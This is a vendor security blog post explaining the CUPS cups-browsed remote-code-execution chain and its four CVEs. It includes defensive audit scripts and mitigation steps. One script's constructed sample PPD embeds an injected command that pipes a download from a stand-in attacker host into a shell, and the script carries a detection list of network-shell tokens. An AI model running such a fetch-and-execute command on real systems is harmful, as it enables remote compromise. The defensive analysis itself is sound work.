
A Cup Half Empty: Linux RCE Flaws Discovered In CUPS


It’s been a rough year for Linux! The XZ Utils backdoor caused tremors worldwide in March, and with the recent discovery of an exploit chain against the CUPS open-source printing system, Linux seems to be caught in a veritable maelstrom of vulnerabilities.

The flaws sit in several components of the Common UNIX Printing System, otherwise known as CUPS. It is the most widely used printing stack on Linux, and the flaws are easy to trigger. Despite the initial 9.9 CVSS rating and the RCE outcome, the real-world impact is estimated to be relatively low: only systems in a specific configuration can be exploited all the way to code execution. This vulnerability, therefore, isn’t necessarily every attacker’s cup of tea.

Technical Details

Before we get into the details of the exploit crafted by researcher Simone “EvilSocket” Margaritelli, let’s take a look at the flaws that comprise it. The affected components are cups-browsed, libcupsfilters, libppd, and cups-filters.

  • CVE-2024-47176: In cups-browsed version 2.0.1 and earlier, the service binds to UDP INADDR_ANY:631, accepting packets from any source, which can trigger a “Get-Printer-Attributes” IPP request to a URL controlled by an attacker.
  • CVE-2024-47076: In libcupsfilters version 2.1b1 and earlier, the function cfGetPrinterAttributes5 fails to validate or sanitize IPP attributes received from an IPP server, allowing attacker-controlled data to be processed by the rest of the CUPS system.
  • CVE-2024-47175: In libppd version 2.1b1 and earlier, the function ppdCreatePPDFromIPP2 does not properly validate or sanitize IPP attributes when writing to a temporary PPD file, enabling the injection of attacker-controlled data into the resulting PPD file.
  • CVE-2024-47177: In cups-filters version 2.0.1 and earlier, the foomatic-rip utility allows arbitrary command execution through the FoomaticRIPCommandLine parameter in PPD files.

A remote, unauthenticated attacker can chain these flaws into RCE. The chain starts with a single UDP packet to port 631 on the target and completes when a print job is sent to the printer that packet registers. Here’s the breakdown:

The cups-browsed component handles the discovery of new printers and automatically adds them to the system. It listens on UDP port 631, checks whether a packet comes from an allowed source, parses a couple of text fields (one of them a printer URI) from the packet, and passes them on to the found_cups_printer function. That source check is hollow in practice: the shipped cups-browsed.conf has every directive commented out, BrowseAllow included, and with no allow-list configured the check accepts packets from anyone. This is CVE-2024-47176.

The URI field handed to found_cups_printer eventually reaches cfGetPrinterAttributes5 in libcupsfilters, which makes cups-browsed connect to it. In other words, an attacker can send a packet carrying a malicious URL to any host running cups-browsed, and that host will treat the URL as an IPP server and connect back to it.

IPP (Internet Printing Protocol) is the protocol printers and client devices use to talk to each other. Once the attacker has the CUPS host connecting to their malicious server, the host treats that server as a printer and sends it a Get-Printer-Attributes request to learn what the printer supports. The attributes in the reply are accepted as-is, with no validation of their contents, and the printer is then registered as a local queue without any confirmation step or notification to the user, which makes this about as effortless as infiltration gets. This is CVE-2024-47076.

Those attributes are then written into a temporary PPD (PostScript Printer Description) file by ppdCreatePPDFromIPP2 in libppd, again without any input sanitization, so attacker-controlled attribute values become PPD directives. This is CVE-2024-47175. PPD files are how vendors describe the features and commands of their printers, and they also name the executables, known as filters, that CUPS runs on a job. cups-filters ships a particularly dangerous filter, foomatic-rip, which runs whatever command the PPD’s FoomaticRIPCommandLine directive specifies as soon as a print job is sent.

The maintainers are aware of the danger of foomatic-rip, but a permanent fix could stop older printer models from working on UNIX-like systems at all, so no fix has been released as of this writing. This is CVE-2024-47177.

With all this information in mind, the actual workings of the exploit should now be clear:

  • The attacker sends a UDP packet to port 631 on the target, advertising a printer whose URL points at the attacker’s IPP server; the target connects to that server.
  • The attacker answers the Get-Printer-Attributes request with attribute strings that contain PPD directives, including a FoomaticRIPCommandLine.
  • When a print job is sent to the fake printer, the command in that directive is executed.
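To check whether a queue on your own system already carries such a directive, here is an added example (not code from the article, from CUPS or cups-filters, or from the researcher’s proof of concept). It scans the PPDs that CUPS keeps for its configured queues and reports every queue that routes jobs through foomatic-rip, together with the FoomaticRIPCommandLine it would run. It assumes the standard CUPS locations /etc/cups/ppd/<queue>.ppd and /etc/cups/printers.conf, and Foomatic’s "&&" end-of-line continuation in PPD values; the sample PPD and printers.conf inside the block are constructed for the demo, and the suspicious-token list is only a triage heuristic.

```python
"""Find CUPS queues whose PPD routes jobs through foomatic-rip and report the
FoomaticRIPCommandLine each one would execute on the next print job.

Added example for this article, not code from the article, CUPS, cups-filters
or the researcher's proof of concept. Assumptions: queue PPDs live in
/etc/cups/ppd/<queue>.ppd and queue definitions in /etc/cups/printers.conf
(standard CUPS locations); long Foomatic values use an "&&" end-of-line
continuation. The sample PPD and printers.conf below are constructed.
"""
import os
import re
import sys

PPD_DIR = "/etc/cups/ppd"
PRINTERS_CONF = "/etc/cups/printers.conf"

# *Keyword[ option]: "value"  -- the value may span lines; PPD quoted values
# cannot contain an unescaped double quote, so stopping at the next " is safe.
PPD_ENTRY_RE = re.compile(r'^\*(\w+)(?:[ \t]+[^:\n]*)?:[ \t]*"(.*?)"', re.M | re.S)

# Triage heuristic only: tokens that have no business in a renderer command.
SUSPICIOUS_TOKENS = ("/dev/tcp", "curl ", "wget ", "nc ", "ncat ", "bash -i",
                     "python", "perl -e", "chmod ", "base64 ")


def ppd_entries(text):
    """Return [(keyword, value)] for every quoted PPD entry, with Foomatic's
    '&&' continuations removed and internal whitespace collapsed."""
    folded = text.replace("&&\n", "")
    return [(key, " ".join(value.split())) for key, value in PPD_ENTRY_RE.findall(folded)]


def analyse_ppd(text):
    """Does this PPD run foomatic-rip, and with which command line(s)?"""
    uses_foomatic = False
    commands = []
    for key, value in ppd_entries(text):
        if key in ("cupsFilter", "cupsFilter2") and "foomatic-rip" in value:
            uses_foomatic = True            # the job is handed to foomatic-rip
        elif key == "FoomaticRIPCommandLine":
            commands.append(value)          # the shell command it will run
    flagged = [c for c in commands if any(t in c for t in SUSPICIOUS_TOKENS)]
    return {"uses_foomatic": uses_foomatic, "commands": commands, "flagged": flagged}


def device_uris(printers_conf_text):
    """Map queue name -> DeviceURI from printers.conf <Printer ...> blocks."""
    uris, name = {}, None
    for raw in printers_conf_text.splitlines():
        line = raw.strip()
        m = re.match(r"<(?:Default)?Printer\s+(\S+)>", line)
        if m:
            name = m.group(1)
        elif line == "</Printer>":
            name = None
        elif name and line.startswith("DeviceURI "):
            uris[name] = line.split(None, 1)[1]
    return uris


def scan_system(ppd_dir=PPD_DIR, printers_conf=PRINTERS_CONF):
    """Scan the live host; returns [(queue, device_uri, analysis)] for every
    queue that uses foomatic-rip or carries a FoomaticRIPCommandLine."""
    uris = {}
    if os.path.isfile(printers_conf):
        with open(printers_conf, encoding="utf-8", errors="replace") as fh:
            uris = device_uris(fh.read())
    results = []
    names = sorted(os.listdir(ppd_dir)) if os.path.isdir(ppd_dir) else []
    for fn in names:
        if not fn.endswith(".ppd"):
            continue
        with open(os.path.join(ppd_dir, fn), encoding="utf-8", errors="replace") as fh:
            a = analyse_ppd(fh.read())
        if a["uses_foomatic"] or a["commands"]:
            results.append((fn[:-4], uris.get(fn[:-4], "?"), a))
    return results


# Constructed sample: a queue whose generated PPD carries an injected filter
# line and command (the command is a placeholder, not a real payload).
SAMPLE_PPD = '''*PPD-Adobe: "4.3"
*ModelName: "Rogue Printer"
*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dSAFER -sDEVICE=ps2write &&
-sOutputFile=- - ; curl http://attacker.example/p | sh"
*DefaultPageSize: A4
'''
SAMPLE_PRINTERS_CONF = '''<Printer Rogue_Printer>
Info Rogue Printer
DeviceURI ipp://192.0.2.10:8631/printers/rogue
State Idle
</Printer>
'''


def demo():
    """Run the analysis over the constructed sample; returns the report lines."""
    a = analyse_ppd(SAMPLE_PPD)
    uri = device_uris(SAMPLE_PRINTERS_CONF).get("Rogue_Printer", "?")
    lines = [f"queue Rogue_Printer  device {uri}  foomatic-rip={a['uses_foomatic']}"]
    lines += [f"  command: {c}" + ("  <-- SUSPICIOUS" if c in a["flagged"] else "")
              for c in a["commands"]]
    return lines


if __name__ == "__main__":
    if "--live" in sys.argv:          # python3 ppd_audit.py --live (needs read access to /etc/cups)
        for queue, uri, a in scan_system():
            print(queue, uri, a)
    else:
        print("\n".join(demo()))
```

Run it with --live (as a user that can read /etc/cups) to list real queues; any queue whose PPD was generated from a remote printer and still carries a FoomaticRIPCommandLine deserves a look, whether or not the heuristic flags it.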

Impact

As mentioned earlier, the simplicity of this chain is alarming, but it can be misleading in terms of real-world impact. Several conditions must all hold for a system to be exploitable through to RCE:

  • The cups-browsed service must be running, since it is the process that exposes UDP port 631 (it is not enabled by default on every distribution).
  • The victim must send a print job to the rogue printer that was added to their list of printers.
  • The attacker must be able to get a UDP packet to port 631 on the target; firewalls commonly block this from the internet, though it is often reachable on a local network.

Then, and only then, can an attacker conduct RCE.

Products Affected

Most GNU/Linux distributions, Oracle Solaris, and potentially Google Chromium/ChromeOS have cups-browsed packaged. There could be other vulnerable distributions as well, since CUPS is supported on UNIX-like operating systems such as FreeBSD, NetBSD, and OpenBSD.

Mitigations and Solutions

Red Hat customers, and anyone else on a systemd-based distribution, can determine whether their system has cups-browsed running with the following command: sudo systemctl status cups-browsed

To mitigate this vulnerability, run the following commands. These will stop cups-browsed from running and prevent it from starting on reboot.

sudo systemctl stop cups-browsed
sudo systemctl disable cups-browsed
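Beyond stopping the service, a practitioner will want to verify the preconditions listed under Impact. The following added audit script (not the article’s or the project’s code) checks the three that can be checked locally: whether cups-browsed is active, whether anything is bound to UDP 631 on a wildcard address, and whether cups-browsed.conf still enables the legacy "cups" browse protocol without any BrowseAllow restriction. It assumes the config lives at /etc/cups/cups-browsed.conf, that the documented default for BrowseRemoteProtocols is "dnssd cups" (where "cups" is the UDP/631 listener), that an absent BrowseAllow means every source is accepted, and that systemctl and ss are available for the live checks. The config and ss samples inside the block are constructed for the demo.

```python
"""Audit a host for the preconditions of the cups-browsed chain that can be
checked locally: is cups-browsed active, is anything bound to UDP 631 on a
wildcard address, and does cups-browsed.conf still accept legacy CUPS browse
packets from any source?

Added example for this article, not the article's or the project's own code.
Assumptions: the config lives at /etc/cups/cups-browsed.conf; the documented
default for BrowseRemoteProtocols is "dnssd cups", where "cups" is the UDP/631
listener; with no BrowseAllow line every source is accepted; systemctl and
`ss -uln` exist for the live checks. The samples at the bottom are constructed.
"""
import re
import shutil
import subprocess
import sys

CONF_PATH = "/etc/cups/cups-browsed.conf"
DEFAULT_REMOTE_PROTOCOLS = ("dnssd", "cups")   # applies when the directive is commented out


def effective_config(conf_text):
    """Parse cups-browsed.conf. Anything after '#' is a comment, so the shipped
    file (every directive commented out) yields the defaults, not the values
    that appear inside the comments."""
    remote, allow = None, []
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, *args = line.split()
        if key.lower() == "browseremoteprotocols":
            remote = tuple(a.lower() for a in args)
        elif key.lower() == "browseallow":
            allow.extend(args)
    if remote is None:
        remote = DEFAULT_REMOTE_PROTOCOLS
    # A bare "all" restricts nothing, so it does not count as an allow-list.
    allow = [a for a in allow if a.lower() != "all"]
    return {"remote_protocols": remote, "allow": allow}


def config_findings(conf_text):
    """Human-readable findings; an empty list means the config is hardened."""
    cfg = effective_config(conf_text)
    findings = []
    if "cups" in cfg["remote_protocols"]:
        findings.append("BrowseRemoteProtocols includes 'cups': the legacy UDP/631 browse listener is on")
        if not cfg["allow"]:
            findings.append("no BrowseAllow configured: browse packets from any source are accepted")
    return findings


def udp631_wildcard_listeners(ss_output):
    """From `ss -uln` output, return local sockets on port 631 bound to a
    wildcard address (0.0.0.0, [::] or *), i.e. reachable on every interface."""
    hits = []
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) < 4 or cols[0] != "UNCONN":     # header or non-UDP line
            continue
        local = cols[3]                               # the "Local Address:Port" column
        if local.endswith(":631") and re.match(r"^(0\.0\.0\.0|\[::\]|\*)(?=:)", local):
            hits.append(local)
    return hits


def service_active(unit="cups-browsed"):
    """True/False from `systemctl is-active`; None when systemd is not available."""
    if not shutil.which("systemctl"):
        return None
    r = subprocess.run(["systemctl", "is-active", unit], capture_output=True, text=True)
    return r.stdout.strip() == "active"


def live_audit():
    """Run the checks against this host and print the results."""
    print("cups-browsed active:", service_active())
    if shutil.which("ss"):
        ss_out = subprocess.run(["ss", "-uln"], capture_output=True, text=True).stdout
        print("UDP/631 wildcard listeners:", udp631_wildcard_listeners(ss_out) or "none")
    try:
        with open(CONF_PATH, encoding="utf-8") as fh:
            findings = config_findings(fh.read())
    except FileNotFoundError:
        findings = [f"{CONF_PATH} not found"]
    for f in findings or ["config: no findings"]:
        print(f)


# Constructed samples: the shipped config (all comments), a hardened one, and
# typical `ss -uln` output with cups-browsed bound on both address families.
DEFAULT_CONF = """# BrowseRemoteProtocols dnssd cups
# BrowseAllow cups.example.com
"""
HARDENED_CONF = """BrowseRemoteProtocols dnssd
BrowseAllow 192.0.2.0/24
"""
SAMPLE_SS = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
UNCONN 0      0      127.0.0.53%lo:53    0.0.0.0:*
UNCONN 0      0      0.0.0.0:631         0.0.0.0:*
UNCONN 0      0      [::]:631            [::]:*
"""

if __name__ == "__main__":
    if "--live" in sys.argv:          # python3 cups_browsed_audit.py --live
        live_audit()
    else:
        print("default config:", config_findings(DEFAULT_CONF))
        print("hardened config:", config_findings(HARDENED_CONF))
        print("wildcard UDP/631:", udp631_wildcard_listeners(SAMPLE_SS))
```

The config parser is the part worth keeping: the shipped file is all comments, so reading it by eye suggests a restriction that does not exist, and only an uncommented BrowseRemoteProtocols without "cups" (or a real BrowseAllow) changes what cups-browsed actually accepts.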

Patches are still being developed, so make sure to apply the mitigation technique; there are possibly hundreds of thousands of vulnerable Linux/UNIX users at the moment and you don’t want to be one of them. Taking the right measures to keep your device protected always pays off. A bitter cup today, a sweet reward tomorrow!

Instantly Fix Risks with SanerNow Patch Management

SanerNow patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. SanerNow patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.